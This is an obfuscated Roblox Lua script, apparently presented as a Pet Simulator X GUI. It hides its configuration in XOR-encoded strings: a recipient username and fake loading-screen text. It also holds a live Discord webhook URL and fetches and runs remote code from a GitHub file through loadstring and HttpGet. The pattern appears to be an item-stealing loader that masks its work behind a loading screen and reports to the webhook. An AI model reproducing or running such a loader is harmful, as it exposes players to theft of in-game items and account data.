--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + ((v11-1)% #v9) ,1 + ((v11-1)% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\8\146\84\177\0\40\146\84\177\1\57","\93\224\53\223\89");WebHook="https://discord.com/api/webhooks/1085220957888712717/m595wVe41yFLQ4GMFJmt5ZU60NzurJCr5NjfRWN85Q20hTPoddt2DL9oWB0b31gui10G";loadingscreen=true;_G.CustomScriptName=v7("\56\208\49\49\59\224\27\120\24\247","\104\131\105\17");_G.Text1=v7("\152\247\12\254\215\191\180\50\248\198\175\241\26\185\137\229","\203\148\126\151\167");_G.Text2=v7("\40\66\218\226\212\17\68\147\240\210\13\3\224\245\207\22\83\199","\127\35\179\150\189");_G.Text3=v7("\174\116\194\188\134\117\201\184\205\79\196\173\132\108\211\172\195\50\137","\237\28\167\223");_G.Text4=v7("\36\227\141\197\218\168\19\248\87\196\143\197\199\177\9\236\89\185\194","\119\151\236\183\174\193\125\159");loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))();
